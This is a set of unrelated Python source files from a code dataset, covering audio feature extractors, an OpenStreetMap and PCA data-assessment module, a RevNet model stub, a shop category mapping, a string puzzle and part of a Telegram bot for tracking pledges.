super().__init__(n_chroma=n_chroma, **kwargs)\n\n def get_feature_names(self):\n return ['chroma_%d' % i for i in range(self.n_chroma)]\n\n\nclass ChromaCQTExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts a constant-q chromogram from audio using the Librosa library.\n\n For details on argument specification visit:\n 
https://librosa.org/doc/latest/generated/librosa.feature.chroma_cqt.html.'''\n\n _feature = 'chroma_cqt'\n\n def __init__(self, n_chroma=12, **kwargs):\n self.n_chroma = n_chroma\n super().__init__(n_chroma=n_chroma, **kwargs)\n\n def get_feature_names(self):\n return ['chroma_cqt_%d' % i for i in range(self.n_chroma)]\n\n\nclass ChromaCENSExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts a chroma variant \"Chroma Energy Normalized\" (CENS)\n chromogram from audio (via Librosa).\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.chroma_cens.html.'''\n\n _feature = 'chroma_cens'\n\n def __init__(self, n_chroma=12, **kwargs):\n self.n_chroma = n_chroma\n super().__init__(n_chroma=n_chroma, **kwargs)\n\n def get_feature_names(self):\n return ['chroma_cens_%d' % i for i in range(self.n_chroma)]\n\n\nclass MelspectrogramExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts mel-scaled spectrogram from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.melspectrogram.html.'''\n\n _feature = 'melspectrogram'\n\n def __init__(self, n_mels=128, **kwargs):\n self.n_mels = n_mels\n super().__init__(n_mels=n_mels, **kwargs)\n\n def get_feature_names(self):\n return ['mel_%d' % i for i in range(self.n_mels)]\n\n\nclass MFCCExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts Mel Frequency Ceptral Coefficients from audio using the\n Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.mfcc.html.'''\n\n _feature = 'mfcc'\n\n def __init__(self, n_mfcc=20, **kwargs):\n self.n_mfcc = n_mfcc\n super().__init__(n_mfcc=n_mfcc, **kwargs)\n\n def get_feature_names(self):\n return ['mfcc_%d' % i for i in range(self.n_mfcc)]\n\n\nclass TonnetzExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the tonal centroids (tonnetz) from audio using the Librosa\n library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.tonnetz.html.'''\n\n _feature = 'tonnetz'\n\n def get_feature_names(self):\n return ['tonal_centroid_%d' % i for i in range(6)]\n\n\nclass TempogramExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts a tempogram from audio using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.feature.tempogram.html.'''\n\n _feature = 'tempogram'\n\n def __init__(self, win_length=384, **kwargs):\n self.win_length = win_length\n super().__init__(win_length=win_length,\n **kwargs)\n\n def get_feature_names(self):\n return ['tempo_%d' % i for i in range(self.win_length)]\n\n\nclass HarmonicExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the harmonic elements from an audio time-series using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.effects.harmonic.html.'''\n\n _feature = 'harmonic'\n\n\nclass PercussiveExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the percussive elements from an audio time-series using the Librosa library.\n\n For details on argument specification visit:\n https://librosa.org/doc/latest/generated/librosa.effects.percussive.html.'''\n\n _feature = 'percussive'\n\n\nclass FundamentalFrequencyExtractor(LibrosaFeatureExtractor):\n\n ''' Extracts the fundamental frequency using the YIN algorithm as\n implemented in the Librosa library.\n\n For details on argument specification 
visit:\n https://librosa.org/doc/latest/generated/librosa.yin.html.'''\n\n _feature = 'yin'\n\n def __init__(self, fmin=65, fmax=2093, **kwargs):\n self.fmin = fmin\n self.fmax = fmax\n super().__init__(fmin=fmin, fmax=fmax, **kwargs)\n\n\nclass AudiosetLabelExtractor(AudioExtractor):\n\n ''' Extract probability of 521 audio event classes based on AudioSet\n corpus using a YAMNet architecture. Code available at:\n https://github.com/tensorflow/models/tree/master/research/audioset/yamnet\n\n Args:\n hop_size (float): size of the audio segment (in seconds) on which label\n extraction is performed.\n top_n (int): specifies how many of the highest label probabilities are\n returned. If None, all labels (or those passed to the labels \n argument) are returned. Top_n and labels are mutually \n exclusive.\n labels (list): specifies subset of labels for which probabilities\n are to be returned. If None, all labels (or top_n) are returned.\n The full list of labels is available in the audioset/yamnet\n repository (see yamnet_class_map.csv).\n weights_path (optional): full path to model weights file. If not provided,\n weights from pretrained YAMNet module are used.\n yamnet_kwargs (optional): Optional named arguments that modify input\n parameters for the model (see params.py file in yamnet repository)\n '''\n\n _log_attributes = ('hop_size', 'top_n', 'labels', 'weights_path',\n 'yamnet_kwargs')\n\n def __init__(self, hop_size=0.1, top_n=None, labels=None,\n weights_path=None, **yamnet_kwargs):\n verify_dependencies(['tensorflow'])\n try:\n sys.path.insert(0, str(YAMNET_PATH))\n self.yamnet = attempt_to_import('yamnet')\n verify_dependencies(['yamnet'])\n except MissingDependencyError:\n msg = ('Yamnet could not be imported. To download and set up '\n 'yamnet, run:\\n\\tpython -m pliers.support.setup_yamnet')\n raise MissingDependencyError(dependencies=None,\n custom_message=msg)\n if top_n and labels:\n raise ValueError('Top_n and labels are mutually exclusive '\n 'arguments. Reinstantiate the extractor setting '\n 'top_n or labels to None (or leaving it '\n 'unspecified).')\n\n MODULE_PATH = path.dirname(self.yamnet.__file__)\n LABELS_PATH = path.join(MODULE_PATH, 'yamnet_class_map.csv')\n self.weights_path = weights_path or path.join(MODULE_PATH, 'yamnet.h5')\n self.hop_size = hop_size\n self.yamnet_kwargs = yamnet_kwargs or {}\n self.params = self.yamnet.params\n self.params.PATCH_HOP_SECONDS = hop_size\n for par, v in self.yamnet_kwargs.items():\n setattr(self.params, par, v)\n if self.params.PATCH_WINDOW_SECONDS != 0.96:\n logging.warning('Custom values for PATCH_WINDOW_SECONDS were '\n 'passed. YAMNet was trained on windows of 0.96s. Different '\n 'values might yield unreliable results.')\n\n self.top_n = top_n\n all_labels = pd.read_csv(LABELS_PATH)['display_name'].tolist()\n if labels is not None:\n missing = list(set(labels) - set(all_labels))\n labels = list(set(labels) & set(all_labels))\n if missing:\n logging.warning(f'Labels {missing} do not exist. Dropping.')\n self.label_idx, self.labels = zip(*[(i,l)\n for i,l in enumerate(all_labels)\n if l in labels])\n else:\n self.labels = all_labels\n self.label_idx = list(range(len(all_labels)))\n super().__init__()\n\n def _extract(self, stim):\n self.params.SAMPLE_RATE = stim.sampling_rate\n\n if self.params.SAMPLE_RATE >= 2 * self.params.MEL_MAX_HZ:\n if self.params.SAMPLE_RATE != 16000:\n logging.warning(\n 'The sampling rate of the stimulus is '\n f'{self.params.SAMPLE_RATE}Hz. YAMNet was trained on '\n ' audio sampled at 16000Hz. 
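# --- Editor's note: where the YIN defaults above come from ---
# fmin=65 and fmax=2093 are, to the nearest Hz, the pitches C2 and C7 -- a range
# wide enough for voice and most melodic instruments; librosa confirms:
import librosa

print(round(float(librosa.note_to_hz('C2'))))  # 65   -> default fmin
print(round(float(librosa.note_to_hz('C7'))))  # 2093 -> default fmax
# --- end editor's note ---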
This should not impact '\n 'predictions, but you can resample the input using '\n 'AudioResamplingFilter for full conformity '\n 'to training.')\n if self.params.MEL_MIN_HZ != 125 or self.params.MEL_MAX_HZ != 7500:\n logging.warning(\n 'Custom values for MEL_MIN_HZ and MEL_MAX_HZ '\n 'were passed. Changing these defaults might affect '\n 'model performance.')\n else:\n raise ValueError(\n 'The sampling rate of your stimulus '\n f'({self.params.SAMPLE_RATE}Hz) must be at least twice the '\n f'value of MEL_MAX_HZ ({self.params.MEL_MAX_HZ}Hz). Upsample'\n ' your audio stimulus (recommended) or pass a lower value of '\n 'MEL_MAX_HZ when initializing the extractor.')\n\n model = self.yamnet.yamnet_frames_model(self.params)\n model.load_weights(self.weights_path)\n preds, _ = model.predict_on_batch(np.reshape(stim.data, [1,-1]))\n preds = preds[:,self.label_idx]\n\n nr_lab = self.top_n or len(self.labels)\n idx = np.mean(preds,axis=0).argsort()\n preds = np.fliplr(preds[:,idx][:,-nr_lab:])\n labels = [self.labels[i] for i in idx][-nr_lab:][::-1]\n\n hop = self.params.PATCH_HOP_SECONDS\n window = self.params.PATCH_WINDOW_SECONDS\n stft_window = self.params.STFT_WINDOW_SECONDS\n stft_hop = self.params.STFT_HOP_SECONDS\n dur = window + stft_window - stft_hop\n onsets = np.arange(start=0, stop=stim.duration - dur, step=hop)\n\n return ExtractorResult(preds, stim, self, features=labels,\n onsets=onsets, durations=[dur]*len(onsets),\n orders=list(range(len(onsets))))\n\n\n\nclass MFCCEnergyExtractor(MFCCExtractor):\n ''' Low-Quefrency and High-Quefrency Mel-Frequency Spectrum extractor.\n \n Extracts two auditory features representing broad-spectrum information (timbre) \n and fine-scale spectral structure (pitch) respectively.\n Derived from Hanke et al., 2015 (https://doi.org/10.12688/f1000research.6679.1)\n \n This extractor maps selected cepstral coefficients back to the spectrum \n domain by reconstructing the n_mfcc mel-frequency spectrum bands using the \n low-quefrency and high-quefrency mfcc coefficients respectively.\n \n Users can select the top or bottom n_coefs. Non-selected coefficients are \n zeroed out, and the result is mapped back to spectral domain using \n inverse DCT (using librosas's mfcc_to_mel function).\n\n Args:\n n_mfcc (int): specifies the number of MFCCs\n n_coefs (int): cepstrum coefficients to keep in the high/low quefrency spectrum\n hop_length (int): hop length in number of samples\n n_mels (int): Dimensionality of mel frequency spectrum to map back to\n register (str): 'low' or 'high'. 
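# --- Editor's note: the top_n selection above, in miniature ---
# Labels are ranked by probability averaged over time windows; the last n columns
# of the argsort are the largest means, flipped so the best label comes first:
import numpy as np

preds = np.array([[0.1, 0.7, 0.2],    # rows: time windows
                  [0.2, 0.6, 0.3]])   # columns: labels
labels = ['speech', 'music', 'dog']

idx = np.mean(preds, axis=0).argsort()        # ascending by mean probability
top2 = np.fliplr(preds[:, idx][:, -2:])       # probabilities, best label first
top2_labels = [labels[i] for i in idx][-2:][::-1]
assert top2_labels == ['music', 'dog']
# --- end editor's note ---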
Specifies which MFCCs are to be kept.\n        norm (str): Normalization type for DCT\n        dct_type (int): Discrete cosine transform (DCT) type, default is 2.\n        lifter (int): If lifter>0, apply inverse liftering (inverse cepstral filtering)\n        librosa_kwargs (optional): Optional named arguments to pass to librosa\n    '''\n\n    _log_attributes = (\n        'n_mfcc', 'n_coefs', 'hop_length', 'n_mels', 'register', \n        'norm','dct_type', 'lifter', 'librosa_kwargs'\n    )\n\n    def __init__(self, n_mfcc=48, n_coefs=13, hop_length=1024, \n                 n_mels=128, register='low', norm='ortho',\n                 dct_type=2, lifter=0, **librosa_kwargs):\n        if register not in ['low', 'high']:\n            raise ValueError('register should be \'low\' or \'high\'')\n        if dct_type not in [1, 2, 3]:\n            raise ValueError('dct_type should be 1, 2, or 3')\n        self.n_mfcc = n_mfcc\n        self.n_mels = n_mels\n        self.n_coefs = n_coefs\n        self.hop_length = hop_length\n        self.register = register\n        self.norm = norm\n        self.dct_type = dct_type\n        self.lifter = lifter\n        self.librosa_kwargs = librosa_kwargs\n\n        super().__init__(n_mfcc=n_mfcc, lifter=lifter, dct_type=dct_type,\n                         norm=norm, n_mels=n_mels, **librosa_kwargs)\n\n    def _get_values(self,stim):\n        vals = super()._get_values(stim)\n        if self.register == 'low':\n            vals[self.n_coefs:] = 0\n        else:\n            vals[:self.n_coefs] = 0\n        \n        \n        mels = librosa.feature.inverse.mfcc_to_mel(\n            vals, n_mels=self.n_mels, dct_type=self.dct_type,\n            norm=self.norm, lifter=self.lifter)\n        \n        return mels\n\n    def get_feature_names(self):\n        return ['mfcc_energy_%d' % i for i in range(self.n_mels)]\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/extractors/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":26254,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"35723653201","text":"from .config import *\nfrom . import access\nimport osmnx as ox\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom IPython.display import display\n\n\"\"\"These are the types of import we might expect in this file\nimport pandas\nimport bokeh\nimport seaborn\nimport matplotlib.pyplot as plt\nimport sklearn.decomposition as decomposition\nimport sklearn.feature_extraction\"\"\"\n\n\"\"\"Place commands in this file to assess the data you have downloaded. How are missing values encoded, how are outliers encoded? What do columns represent? Make sure they are correctly labeled. How is the data indexed? Create visualisation routines to assess the data (e.g. in bokeh). 
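# --- Editor's note: hedged sketch reproducing the low/high-quefrency split above ---
# Compute MFCCs, zero out either everything after the first n_coefs rows ('low'
# register, broad timbre) or those rows themselves ('high' register, fine spectral
# structure), then invert back to a mel spectrum; the synthetic tone is my stand-in
# input, not project test data.
import librosa

y = librosa.tone(440, sr=22050, duration=1.0)
mfcc = librosa.feature.mfcc(y=y, sr=22050, n_mfcc=48)

low = mfcc.copy();  low[13:] = 0     # keep low-quefrency coefficients
high = mfcc.copy(); high[:13] = 0    # keep high-quefrency coefficients

mel_low = librosa.feature.inverse.mfcc_to_mel(low, n_mels=128)
mel_high = librosa.feature.inverse.mfcc_to_mel(high, n_mels=128)
print(mel_low.shape, mel_high.shape)  # both (128, n_frames)
# --- end editor's note ---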
Ensure that date formats are correct and correctly timezoned.\"\"\"\n\nKEYS_DICT = {\n \"public_transport\": True,\n \"amenity\": True, \n \"leisure\": True, \n \"natural\": True, \n \"landuse:residential\": True,\n \"shop\": True,\n \"tourism\": True,\n \"historic\": True,\n \"aeroway\": True,\n \"healthcare\": True,\n \"industrial\": True,\n \"flood_prone\": True,\n \"highway\": True,\n \"waste\": True\n }\n\nKEYS = [\"public_transport\", \"amenity\", \"leisure\", \"natural\", \"shop\", \"tourism\", \n \"historic\", \"aeroway\", \"healthcare\", \"industrial\", \"flood_prone\", \"highway\", \"waste\"]\n\nTAGS = [(\"amenity\", \"school\")]\n\nLOCATIONS = [(51.5316, -0.1236, \"Kings Cross, London\"), (50.2660, -5.0527, \"Cornwall, England\"), (52.1951, 0.1313, \"Cambridge, England\")]\n\nCOLOURS = ['black', 'red', 'darkorange', 'gold', 'yellow', 'darkolivegreen', 'lime', 'silver',\n 'aquamarine', 'dodgerblue', 'purple', 'fuchsia', 'lightpink', 'peru']\n\ndef view(num_rows=100, seed=1):\n \"\"\"Provide a view of the data that allows the user to verify some aspect of its quality.\"\"\"\n visualise_pois_by_key(LOCATIONS, KEYS)\n visualise_pois_by_key(LOCATIONS, TAGS, tag_version=True)\n credentials = access.get_credentials(\"credentials.yaml\")\n conn = access.create_connection(user=credentials[\"username\"], password=credentials[\"password\"], host=credentials[\"url\"], port=credentials[\"port\"], database=credentials[\"name\"])\n rows = access.get_random_rows(conn, num_rows, seed)\n pois_by_features = get_pois_for_rows(rows)\n visualise_feature_dist(pois_by_features)\n corr, princ_compt = conduct_PCA(pois_by_features)\n vis_PCA1(corr, princ_compt)\n vis_PCA2(corr, princ_compt)\n vis_PCA3(corr, princ_compt)\n\ndef get_pois_for_rows(rows):\n pois_by_features = []\n for i in range(len(rows)):\n count_pois = count_pois_by_features(get_pois(float(rows.iloc[i].latitude), float(rows.iloc[i].longitude), KEYS_DICT), KEYS, TAGS)\n count_pois['price'] = rows.iloc[i].price\n pois_by_features.append(count_pois)\n return pois_by_features\n\ndef conduct_PCA(pois_by_features):\n df = pd.DataFrame(pois_by_features)\n corr = df.corr()\n display(corr.style.background_gradient(cmap='Reds'))\n corr = corr.drop('price')\n corr = corr.drop('price', axis=1)\n pca = PCA(n_components=len(corr))\n princ_compt = pca.fit_transform(corr)\n explained_variance = np.concatenate([np.array([0]), np.cumsum(pca.explained_variance_ratio_)])\n cutoff = np.argmax(explained_variance > 0.95)\n for i in range(1, cutoff + 1):\n print(f\"The explained variance with {i} principal components is: {explained_variance[i]}\")\n plt.ylabel('Explained variance')\n plt.xlabel('Number of principal components')\n plt.yticks(np.arange(0, 1.1, 0.1))\n plt.plot(explained_variance)\n plt.show()\n return corr, princ_compt\n \ndef vis_PCA1(corr, princ_compt):\n for i, col in enumerate(corr.columns):\n plt.scatter(princ_compt[i,0], [0], c=COLOURS[i], label=col)\n plt.title(\"1 Principal component\")\n plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n plt.yticks([])\n plt.show()\n \ndef vis_PCA2(corr, princ_compt):\n for i, col in enumerate(corr.columns):\n plt.scatter(princ_compt[i,0], princ_compt[i,1], c=COLOURS[i], label=col)\n plt.title(\"2 Principal components\")\n plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n plt.xlabel(\"Principal component 1\")\n plt.ylabel(\"Principal component 2\")\n plt.show()\n\ndef vis_PCA3(corr, princ_compt):\n fig = plt.figure()\n ax = fig.add_subplot(projection='3d')\n for i, col in 
enumerate(corr.columns):\n ax.scatter(princ_compt[i,0], princ_compt[i,1], princ_compt[i,2], c=COLOURS[i], label=col)\n ax.set_title(\"3 Principal components\")\n ax.legend(loc='center left', bbox_to_anchor=(1.25, 0.5))\n ax.set_xlabel(\"Principal component 1\")\n ax.set_ylabel(\"Principal component 2\")\n ax.set_zlabel(\"Principal component 3\")\n plt.show()\n\n\ndef get_pois(latitude, longitude, tags, box_height=0.02, box_width=0.02):\n north = latitude + box_height/2\n south = latitude - box_height/2\n west = longitude - box_width/2\n east = longitude + box_width/2\n return ox.features_from_bbox(north, south, east, west, tags)\n\ndef get_graph(latitude, longitude, box_height=0.02, box_width=0.02):\n north = latitude + box_height/2\n south = latitude - box_height/2\n west = longitude - box_width/2\n east = longitude + box_width/2\n return ox.graph_from_bbox(north, south, east, west)\n\ndef get_box(latitude, longitude, box_height=0.02, box_width=0.02):\n north = latitude + box_height/2\n south = latitude - box_height/2\n west = longitude - box_width/2\n east = longitude + box_width/2\n return north, south, west, east\n\ndef count_pois_by_features(pois, keys, tags):\n count_by_features = {}\n for key in keys:\n try:\n count_by_features[key] = len(pois[pois[key].isna() == False])\n except:\n count_by_features[key] = 0\n for key, tag in tags:\n try:\n count_by_features[tag] = len(pois[pois[key] == tag])\n except:\n count_by_features[tag] = 0\n if key in count_by_features:\n count_by_features[key] -= count_by_features[tag]\n return count_by_features\n\ndef visualise_pois_by_key(locations, keys, box_height=0.02, box_width=0.02, tag_version=False):\n pois = []\n graphs = []\n\n for loc in locations:\n pois.append(get_pois(loc[0], loc[1], KEYS_DICT, box_height, box_width))\n graphs.append(get_graph(loc[0], loc[1], box_height, box_width))\n \n _, ax = plt.subplots(len(keys), len(locations), figsize=(len(locations[0][2]), (len(keys)) * 4))\n\n for i, loc in enumerate(locations):\n for j, key in enumerate(keys):\n try: \n _, edges = ox.graph_to_gdfs(graphs[i])\n area = ox.geocode_to_gdf(loc[2], which_result=1)\n if len(keys) > 1:\n sub_ax = ax[j][i]\n else:\n sub_ax = ax[i]\n area.plot(ax=sub_ax, facecolor=\"white\")\n edges.plot(ax=sub_ax, linewidth=1, edgecolor=\"dimgray\")\n north, south, west, east = get_box(loc[0], loc[1], box_height, box_width)\n sub_ax.set_xlim([west, east])\n sub_ax.set_ylim([south, north])\n sub_ax.set_xlabel(\"longitude\")\n sub_ax.set_ylabel(\"latitude\")\n if tag_version:\n sub_ax.set_title(f\"{loc[2]} {key[0]}={key[1]}\")\n pois_subset = pois[i][pois[i][key[0]] == key[1]]\n else:\n sub_ax.set_title(f\"{loc[2]} {key}\")\n pois_subset = pois[i][pois[i][key].isna() == False]\n pois_subset.plot(ax=sub_ax, color=\"blue\", alpha=0.7, markersize=10)\n except KeyError:\n print(f\"{loc[2]} has no {key} keys\")\n plt.tight_layout()\n plt.show()\n \ndef visualise_feature_dist(pois_by_features, bins=10):\n features = {}\n for key in pois_by_features[0].keys():\n for pois in pois_by_features:\n features[key] = features.get(key, []) + [pois[key]]\n _, ax = plt.subplots(len(features)//3 + 1, 3, figsize=(len(next(iter(features.keys()))), len(features) * 1.5))\n for i, feature in enumerate(features.items()):\n sub_ax = ax[i//3][i%3]\n sub_ax.set_title(feature[0])\n sub_ax.hist(feature[1], bins=bins)\n 
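The component-count selection used in conduct_PCA above (accumulate explained variance, keep the smallest number of components crossing a 95% threshold) can be sketched in isolation. The data here is synthetic, standing in for the feature correlation matrix:

```python
import numpy as np
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
X = rng.normal(size=(100, 14))          # stand-in for the 14-feature matrix
pca = PCA(n_components=X.shape[1])
pca.fit(X)
cumulative = np.cumsum(pca.explained_variance_ratio_)
n_components = int(np.argmax(cumulative > 0.95)) + 1  # first index crossing 95%
print(f"{n_components} components explain {cumulative[n_components - 1]:.2%} of variance")
```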
plt.show()","repo_name":"Isaac-d22/ADS_final_assignment","sub_path":"fynesse/assess.py","file_name":"assess.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40805638860","text":"##coding=utf-8\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\n\n\nimport json\nimport numpy as np\nimport tensorflow as tf\n\nfrom collections import namedtuple#返回元组数据\nfrom resnet.models.nnlib import concat as _concat\nfrom resnet.models.model_factory import RegisterModel\nfrom resnet.models.resnet_model import ResNetModel\nfrom resnet.utils import logger\n\nlog = logger.get()\n\n@RegisterModel(\"revnet\")\nclass RevNetModel(ResNetModel):\n def __init__(self,\n config,\n is_training=True,\n inference_only=False,\n inp=None,\n label=None,\n dtype=tf.float32,\n batch_size=None,\n apply_grad=True,\n idx=0):\n if config.manmual_gradients:\n self._wd_hidden = config.wd#隐藏层衰减率\n assert self._wd_hidden > 0.0,\"Not applying weight decay!\"#判断隐藏层的衰减率是否大于0\n dd = config.__dict__#获取配置内容,包括key和value\n\n #config2是干嘛用的????????\n config2 = json.loads(json.dumps(config.__dict__),\n object_hook=lambda d:namedtuple('X',d.keys())(*d.values()))\n dd = config2.__dict__\n dd[\"wd\"] = 0.0\n config2 = json.loads(\n json.dumps(dd),\n object_hook=lambda d:namedtuple('X',d.keys())(*d.values()))\n assert config2.wd == 0.0,\"weight decay not cleared\"\n assert config.wd > 0,\"weight decay not cleared\"\n else:\n config2 = config\n super(RevNetModel, self).__init__(\n config2,\n is_training = is_training,\n inference_only=inference_only,\n inp = inp,\n label=label,\n batch_size=batch_size,\n apply_grad=apply_grad\n )\n\n","repo_name":"jainszhang/LearnDM","sub_path":"DL/revnet-test/resnet/models/revnet.py","file_name":"revnet.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18246481143","text":"catalog_mapping = {\n 'caj': {\n 'name': 'Čaj',\n 'template': 'tea.html'\n },\n 'kava': {\n 'name': 'Káva',\n 'template': 'coffee.html',\n },\n 'orechy': {\n 'name': 'Ořechy',\n 'template': 'nuts.html',\n },\n 'susene-ovoce': {\n 'name': 'Sušené ovoce',\n 'template': 'dried-fruit.html',\n },\n 'vazene-bonbony': {\n 'name': 'Vážené bonbony',\n 'template': 'weighted-candy.html',\n },\n 'bylinne-kapky': {\n 'name': 'Bylinné kapky',\n 'template': 'herbal-drops.html',\n },\n 'bylinne-sirupy': {\n 'name': 'Bylinné sirupy',\n 'template': 'herbal-syrups.html',\n },\n 'ovocne-sirupy': {\n 'name': 'Ovocné sirupy',\n 'template': 'fruit-syrups.html',\n },\n 'med': {\n 'name': 'Med',\n 'template': 'honey.html',\n },\n 'alkoholicke-napoje': {\n 'name': 'Alkoholické nápoje',\n 'template': 'alcoholic-beverages.html',\n },\n 'kosmetika': {\n 'name': 'Kosmetika',\n 'template': 'cosmetics.html',\n },\n 'oleje-a-octy': {\n 'name': 'Oleje a octy',\n 'template': 'oils.html',\n },\n 'porcelan': {\n 'name': 'Porcelán',\n 'template': 'porcelain.html',\n },\n 'accessories': {\n 'name': 'Příslušenství',\n 'template': 'accessories.html',\n },\n}\n","repo_name":"just-paja/cajovyobchudek.cz","sub_path":"website/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352621407","text":"# -*- coding: utf-8 -*-\n\n\"\"\"题目描述\n在一个字符串(1<=字符串长度<=10000,全部由字母组成)中找到第一个只出现一次的字符,并返回它的位置\n\"\"\"\n\nfrom 
collections import OrderedDict\nclass Solution:\n def FirstNotRepeatingChar(self, s):\n if len(s) < 1 or len(s) > 10000:\n return -1\n # write code here\n table = OrderedDict()\n postable = {}\n for idx, ch in enumerate(s):\n if ch not in table:\n table[ch] = 1\n postable[ch] = idx\n else:\n table[ch] += 1\n\n for k, v in table.items():\n if v == 1:\n return postable[k]\n return -1\n\nif __name__ == '__main__':\n s = Solution()\n n = s.FirstNotRepeatingChar('NXWtnzyoHoBhUJaPauJaAitLWNMlkKwDYbbigdMMaYfkVPhGZcrEwp')\n print(n)\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"interview/CyC2018_Interview-Notebook/剑指offer/50.py","file_name":"50.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"28143413424","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.utils.emoji import emojize\n\nfrom loader import dp, bot, _\nfrom keyboards.reply.reply_kb import markup_general_menu, back_kb, markup_organaiser_menu, proof_yes_no_kb, \\\n check_intention_for_me, check_obligation_for_me\nfrom models.db_service import DBService\nfrom states.menu_states import Menu, IntentionTo\nfrom utils.functions import is_digit, text_sum_digit, get_status_emoji, check_number_dict, create_list_intention, \\\n text_intention_to, text_need_intention_to_obligation, text_need_intention_to_sponsor, text_obligation_to, \\\n text_need_obligation, text_need_obligation_to_sponsor, text_proof_forgive_obligation_from, \\\n text_final_forgive_obligation_from, text_forgive_obligation_to\n\ndbs = DBService()\n\n\nasync def global_menu(message):\n await Menu.global_menu.set()\n markup = await markup_general_menu()\n await bot.send_message(message.chat.id, _('Меню'), reply_markup=markup)\n\n\nasync def intention_to_me(message, state: FSMContext):\n markup = await back_kb()\n intentions = await dbs.intentions.get_intentions(statuses=[1], to_id=message.chat.id)\n obligations = await dbs.intentions.get_intentions(statuses=[11], to_id=message.chat.id)\n\n data = await state.get_data()\n dict_intention_to = data[\"dict_intention_to\"]\n list_intention = await create_list_intention(dict_intention_to, to_id=True)\n text = emojize(_(\"В вашу пользу {} :heart: и {} :handshake:\\n{}\\n\")).format(len(intentions), len(obligations),\n list_intention)\n text += _(\"Введите номер записи, чтобы посмотреть подробную информацию или изменить\")\n await IntentionTo.list_intention.set()\n await bot.send_message(message.chat.id, text, reply_markup=markup)\n\n\n@dp.message_handler(state=IntentionTo.list_intention)\nasync def dict_intention_to_menu(message: types.Message, state: FSMContext):\n in_text = message.text\n await bot.delete_message(message.chat.id, message.message_id)\n\n if _(\"Назад\") in in_text:\n await Menu.organaiser_menu.set()\n markup = await markup_organaiser_menu()\n user = await dbs.users.get_user(message.chat.id)\n emoji_status = await get_status_emoji(user.status)\n text = _(\"Органайзер\") + emoji_status\n await bot.send_message(message.chat.id, text, reply_markup=markup)\n return\n\n if not await is_digit(in_text):\n text = await text_sum_digit()\n await bot.send_message(message.chat.id, text)\n return\n\n data = await state.get_data()\n dict_intention_to = data[\"dict_intention_to\"]\n\n if in_text not in dict_intention_to:\n text = await check_number_dict()\n await bot.send_message(message.chat.id, text)\n return\n\n id_intention_to = dict_intention_to[in_text]\n intention = 
await dbs.intentions.get_intention_from_id(id_intention_to)\n if intention.status == 1:\n text_intention = await text_intention_to(id_intention_to)\n await state.update_data(id_intention_to=id_intention_to)\n markup_intention_settings_kb = await check_intention_for_me()\n await IntentionTo.intention_settings.set()\n\n await bot.send_message(message.chat.id, text_intention, reply_markup=markup_intention_settings_kb)\n\n elif intention.status == 11:\n text_obligation = await text_obligation_to(id_intention_to)\n await state.update_data(id_obligation_to=id_intention_to)\n markup_obligation_settings_kb = await check_obligation_for_me()\n await IntentionTo.obligation_settings.set()\n\n await bot.send_message(message.chat.id, text_obligation, reply_markup=markup_obligation_settings_kb)\n\n\n@dp.message_handler(state=IntentionTo.intention_settings)\nasync def intention_to_me_settings_menu(message: types.Message, state: FSMContext):\n in_text = message.text\n await bot.delete_message(message.chat.id, message.message_id)\n\n if _(\"Попросить\") in in_text:\n data = await state.get_data()\n id_intention_to = data[\"id_intention_to\"]\n intention = await dbs.intentions.get_intention_from_id(id_intention_to)\n\n text_me = await text_need_intention_to_obligation()\n await bot.send_message(message.chat.id, text_me)\n\n text_to = await text_need_intention_to_sponsor(id_intention_to)\n await bot.send_message(intention.from_id, text_to)\n\n await intention_to_me(message, state)\n return\n elif _(\"Назад\") in in_text:\n await intention_to_me(message, state)\n return\n elif _(\"Меню\") in in_text:\n await global_menu(message)\n return\n\n\n@dp.message_handler(state=IntentionTo.obligation_settings)\nasync def obligation_to_me_settings_menu(message: types.Message, state: FSMContext):\n in_text = message.text\n await bot.delete_message(message.chat.id, message.message_id)\n data = await state.get_data()\n id_obligation_to = data[\"id_obligation_to\"]\n obligation = await dbs.intentions.get_intention_from_id(id_obligation_to)\n\n if _(\"Запрос\") in in_text:\n text_me = await text_need_obligation(id_obligation_to)\n await bot.send_message(message.chat.id, text_me)\n\n text_to = await text_need_obligation_to_sponsor(id_obligation_to)\n await bot.send_message(obligation.from_id, text_to)\n\n await intention_to_me(message, state)\n return\n elif _(\"Простить\") in in_text:\n text_me = await text_proof_forgive_obligation_from(id_obligation_to)\n await IntentionTo.obligation_forgive_proof.set()\n markup = await proof_yes_no_kb()\n await bot.send_message(message.chat.id, text_me, reply_markup=markup)\n return\n\n elif 